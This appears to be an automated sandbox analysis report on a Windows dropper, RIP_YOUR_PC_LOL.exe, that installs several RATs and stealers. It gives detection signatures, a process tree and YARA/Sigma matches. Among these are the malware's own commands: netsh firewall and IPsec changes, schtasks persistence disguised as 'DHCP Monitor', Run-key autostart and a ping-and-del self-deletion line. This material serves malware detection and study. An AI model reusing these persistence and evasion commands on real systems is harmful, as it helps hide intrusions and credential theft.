
Windows Analysis Report
RIP_YOUR_PC_LOL.exe

Overview

General Information

Sample Name: RIP_YOUR_PC_LOL.exe
Analysis ID: 585264
MD5: 52867174362410d63215d78e708103ea
SHA1: 7ae4e1048e4463a4201bdeaf224c5b6face681bf
SHA256: 37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a
Tags: exe

Detection

HawkEye, Nanocore, njRat, AsyncRAT, Azorult, DCRat, Ficker Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected MailPassView
Yara detected HawkEye Keylogger
Sigma detected: NanoCore
Yara detected AntiVM3
Yara detected Azorult Info Stealer
Detected Nanocore Rat
Yara detected AsyncRAT
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Yara detected Nanocore RAT
Yara detected DCRat
Yara detected Generic Dropper
Yara detected Azorult
Multi AV Scanner detection for submitted file
Detected njRat
Malicious sample detected (through community Yara rule)
Yara detected Njrat
Antivirus / Scanner detection for submitted sample
Yara detected Mimikatz
Detected HawkEye Rat
Multi AV Scanner detection for dropped file
Yara detected Ficker Stealer
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Drops PE files to the startup folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Creates autostart registry keys with suspicious names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Sample uses process hollowing technique
Sigma detected: File Created with System Process Name
Sigma detected: Suspicious Add Scheduled Task From User AppData Temp
Protects its processes via BreakOnTermination flag
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Yara detected WebBrowserPassView password recovery tool
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: CurrentVersion Autorun Keys Modification
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Sigma detected: Suspicious Add Scheduled Task Parent
Creates files inside the system directory
May infect USB drives
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sigma detected: Autorun Keys Modification

Classification

  • System is w10x64
  • RIP_YOUR_PC_LOL.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe" MD5: 52867174362410D63215D78E708103EA)
    • healastounding.exe (PID: 3572 cmdline: "C:\Users\user\AppData\Roaming\healastounding.exe" MD5: 6FB798F1090448CE26299C2B35ACF876)
      • test.exe (PID: 6236 cmdline: "C:\Users\user\AppData\Roaming\test.exe" MD5: 7E50B292982932190179245C60C0B59B)
      • gay.exe (PID: 1104 cmdline: "C:\Users\user\AppData\Roaming\gay.exe" MD5: 8EEDC01C11B251481DEC59E5308DCCC3)
        • mediaget.exe (PID: 4688 cmdline: "C:\Users\user\AppData\Roaming\mediaget.exe" MD5: 8EEDC01C11B251481DEC59E5308DCCC3)
          • netsh.exe (PID: 7092 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Opus.exe (PID: 3244 cmdline: "C:\Users\user\AppData\Roaming\Opus.exe" MD5: 759185EE3724D7563B709C888C696959)
        • schtasks.exe (PID: 6420 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 3280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 7052 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp5D87.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • aaa.exe (PID: 3984 cmdline: "C:\Users\user\AppData\Roaming\aaa.exe" MD5: 860AA57FC3578F7037BB27FC79B2A62C)
        • aaa.exe (PID: 6256 cmdline: C:\Users\user\AppData\Roaming\aaa.exe MD5: 860AA57FC3578F7037BB27FC79B2A62C)
      • 8f1c8b40c7be588389a8d382040b23bb.exe (PID: 5376 cmdline: "C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe" MD5: 8F1C8B40C7BE588389A8D382040B23BB)
        • FFDvbcrdfqs.exe (PID: 6920 cmdline: "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe" MD5: 78D40B12FFC837843FBF4DE2164002F6)
        • Dcvxaamev.exe (PID: 6612 cmdline: "C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe" MD5: 870D6E5AEF6DEA98CED388CCE87BFBD4)
      • 4.exe (PID: 2824 cmdline: "C:\Users\user\AppData\Roaming\4.exe" MD5: E6DACE3F577AC7A6F9747B4A0956C8D7)
        • 3.exe (PID: 3964 cmdline: "C:\Users\user\AppData\Roaming\3.exe" MD5: 748A4BEA8C0624A4C7A69F67263E0839)
      • a.exe (PID: 5152 cmdline: "C:\Users\user\AppData\Roaming\a.exe" MD5: 52CFD35F337CA837D31DF0A95CE2A55E)
    • Pluto Panel.exe (PID: 4236 cmdline: "C:\Users\user\AppData\Roaming\Pluto Panel.exe" MD5: ED666BF7F4A0766FCEC0E9C8074B089B)
    • 22.exe (PID: 1272 cmdline: "C:\Users\user\AppData\Roaming\22.exe" MD5: DBF9DAA1707B1037E28A6E0694B33A4B)
      • netsh.exe (PID: 6500 cmdline: netsh ipsec static add policy name=Block MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 3252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 6596 cmdline: netsh ipsec static add filterlist name=Filter1 MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5932 cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5940 cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 1616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5748 cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5504 cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 6060 cmdline: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ___11.19.exe (PID: 6732 cmdline: "C:\Users\user\AppData\Roaming\___11.19.exe" MD5: A071727B72A8374FF79A695ECDE32594)
      • svchost.exe (PID: 6552 cmdline: C:\Users\user\AppData\Local\Temp\\svchost.exe MD5: A4329177954D4104005BCE3020E5EF59)
        • cmd.exe (PID: 1852 cmdline: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • svchos.exe (PID: 1588 cmdline: C:\Users\user\AppData\Local\Temp\\svchos.exe MD5: 3B377AD877A942EC9F60EA285F7119A2)
      • HD____11.19.exe (PID: 2508 cmdline: C:\Users\user\AppData\Roaming\HD____11.19.exe MD5: B14120B6701D42147208EBF264AD9981)
  • Opus.exe (PID: 6580 cmdline: C:\Users\user\AppData\Roaming\Opus.exe 0 MD5: 759185EE3724D7563B709C888C696959)
  • dhcpmon.exe (PID: 6328 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" MD5: 759185EE3724D7563B709C888C696959)
  • dhcpmon.exe (PID: 6308 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0 MD5: 759185EE3724D7563B709C888C696959)
  • mediaget.exe (PID: 6036 cmdline: "C:\Users\user\AppData\Roaming\mediaget.exe" .. MD5: 8EEDC01C11B251481DEC59E5308DCCC3)
  • mediaget.exe (PID: 1080 cmdline: "C:\Users\user\AppData\Roaming\mediaget.exe" .. MD5: 8EEDC01C11B251481DEC59E5308DCCC3)
  • TXPlatforn.exe (PID: 5700 cmdline: C:\Windows\SysWOW64\TXPlatforn.exe -auto MD5: A4329177954D4104005BCE3020E5EF59)
    • TXPlatforn.exe (PID: 1480 cmdline: C:\Windows\SysWOW64\TXPlatforn.exe -acsi MD5: A4329177954D4104005BCE3020E5EF59)
  • svchost.exe (PID: 6268 cmdline: C:\Windows\SysWOW64\svchost.exe -k " " MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 6052 cmdline: C:\Windows\SysWOW64\svchost.exe -k " " MD5: FA6C268A5B5BDA067A901764D203D433)
  • mediaget.exe (PID: 5644 cmdline: "C:\Users\user\AppData\Roaming\mediaget.exe" .. MD5: 8EEDC01C11B251481DEC59E5308DCCC3)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
RIP_YOUR_PC_LOL.exe | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0x1308075:$x1: NanoCore.ClientPluginHost
  • 0x13080b2:$x2: IClientNetworkHost
  • 0x130bbe5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
RIP_YOUR_PC_LOL.exe | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x7bdb7:$key: HawkEyeKeylogger
  • 0x7dff3:$salt: 099u787978786
  • 0x7c3f0:$string1: HawkEye_Keylogger
  • 0x7d243:$string1: HawkEye_Keylogger
  • 0x7df53:$string1: HawkEye_Keylogger
  • 0x7c7d9:$string2: holdermail.txt
  • 0x7c7f9:$string2: holdermail.txt
  • 0x7c71b:$string3: wallet.dat
  • 0x7c733:$string3: wallet.dat
  • 0x7c749:$string3: wallet.dat
  • 0x7db35:$string4: Keylog Records
  • 0x7de4d:$string4: Keylog Records
  • 0x7e04b:$string5: do not script -->
  • 0x7bd9f:$string6: \pidloc.txt
  • 0x7be05:$string7: BSPLIT
  • 0x7be15:$string7: BSPLIT
RIP_YOUR_PC_LOL.exe | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x7901:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
RIP_YOUR_PC_LOL.exe | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
RIP_YOUR_PC_LOL.exe | JoeSecurity_GenericDropper | Yara detected Generic Dropper | Joe Security
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\gay.exe | JoeSecurity_Njrat | Yara detected Njrat | Joe Security
C:\Users\user\AppData\Roaming\gay.exe | MALWARE_Win_NjRAT | Detects NjRAT / Bladabindi | ditekSHen
  • 0x81fc:$s1: netsh firewall delete allowedprogram
  • 0x80f2:$s2: netsh firewall add allowedprogram
  • 0x825c:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 6B 00 20 00 70 00 69 00 6E 00 67
  • 0x7ee6:$s4: Execute ERROR
  • 0x7f46:$s4: Execute ERROR
  • 0x7f0a:$s5: Download ERROR
  • 0x82a2:$s6: [kl]
C:\Users\user\AppData\Roaming\gay.exe | njrat1 | Identify njRat | Brian Wallace @botnet_hunter
  • 0x80f2:$a1: netsh firewall add allowedprogram
  • 0x82ec:$b1: [TAP]
  • 0x8292:$b2: & exit
  • 0x825e:$c1: md.exe /k ping 0 & del
C:\Users\user\AppData\Roaming\Opus.exe | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
C:\Users\user\AppData\Roaming\Opus.exe | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
Source | Rule | Description | Author | Strings
00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfcf5:$a: NanoCore
  • 0xfd05:$a: NanoCore
  • 0xff39:$a: NanoCore
  • 0xff4d:$a: NanoCore
  • 0xff8d:$a: NanoCore
  • 0xfd54:$b: ClientPlugin
  • 0xff56:$b: ClientPlugin
  • 0xff96:$b: ClientPlugin
  • 0xfe7b:$c: ProjectData
  • 0x10882:$d: DESCrypto
  • 0x1824e:$e: KeepAlive
  • 0x1623c:$g: LogClientMessage
  • 0x12437:$i: get_Connected
  • 0x10bb8:$j: #=q
  • 0x10be8:$j: #=q
  • 0x10c04:$j: #=q
  • 0x10c34:$j: #=q
  • 0x10c50:$j: #=q
  • 0x10c6c:$j: #=q
  • 0x10c9c:$j: #=q
  • 0x10cb8:$j: #=q
00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0x97f3:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Source | Rule | Description | Author | Strings
0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0x99f3:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.RIP_YOUR_PC_LOL.exe.d4dd52.5.raw.unpack | MALWARE_Win_BlackMoon | Detects executables using BlackMoon RunTime | ditekSHen
  • 0x4e6a:$s1: blackmoon
  • 0x4eaa:$s2: BlackMoon RunTime Error:
0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0x7bf3:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM

AV Detection

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Opus.exe, ProcessId: 3244, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Opus.exe, ProcessId: 3244, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

System Summary

Source: Process started | Author: David Burkett | Data: Command: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\___11.19.exe" , ParentImage: C:\Users\user\AppData\Roaming\___11.19.exe, ParentProcessId: 6732, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, ProcessId: 6552
Source: Process started | Author: Florian Roth | Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Opus.exe" , ParentImage: C:\Users\user\AppData\Roaming\Opus.exe, ParentProcessId: 3244, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, ProcessId: 6420
Source: Process started | Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community | Data: Command: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\___11.19.exe" , ParentImage: C:\Users\user\AppData\Roaming\___11.19.exe, ParentProcessId: 6732, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, ProcessId: 6552
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\___11.19.exe" , ParentImage: C:\Users\user\AppData\Roaming\___11.19.exe, ParentProcessId: 6732, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, ProcessId: 6552
Source: File created | Author: Sander Wiebing, Tim Shelton | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\22.exe, ProcessId: 1272, TargetFilename: C:\Windows\Help\Winlogon.exe
Source: Process started | Author: frack113 | Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Opus.exe" , ParentImage: C:\Users\user\AppData\Roaming\Opus.exe, ParentProcessId: 3244, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, ProcessId: 6420
Source: Process started | Author: Markus Neis, Sander Wiebing | Data: Command: netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE, CommandLine: netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE, CommandLine|base64offset|contains: l, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\mediaget.exe" , ParentImage: C:\Users\user\AppData\Roaming\mediaget.exe, ParentProcessId: 4688, ProcessCommandLine: netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE, ProcessId: 7092
Source: DNS query | Author: Brandon George (blog post), Thomas Patzke (rule) | Data: Image: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe, QueryName: api.ipify.org
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\mediaget.exe" .., EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\mediaget.exe, ProcessId: 4688, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466
Source: Process started | Author: Florian Roth | Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Opus.exe" , ParentImage: C:\Users\user\AppData\Roaming\Opus.exe, ParentProcessId: 3244, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp, ProcessId: 6420
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Opus.exe, ProcessId: 3244, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Monitor
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton | Data: Details: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Opus.exe, ProcessId: 3244, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Monitor
Source: Process started | Author: frack113 | Data: Command: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul, CommandLine: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentProcessId: 6552, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul, ProcessId: 1852
Source: Process started | Author: frack113 | Data: Command: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul, CommandLine: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentProcessId: 6552, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul, ProcessId: 1852
Source: Process started | Author: vburov | Data: Command: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\___11.19.exe" , ParentImage: C:\Users\user\AppData\Roaming\___11.19.exe, ParentProcessId: 6732, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\\svchost.exe, ProcessId: 6552
Source: Process started | Author: frack113 | Data: Command: "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe" , ParentImage: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe, ParentProcessId: 5376, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe" , ProcessId: 6920

Stealing of Sensitive Information

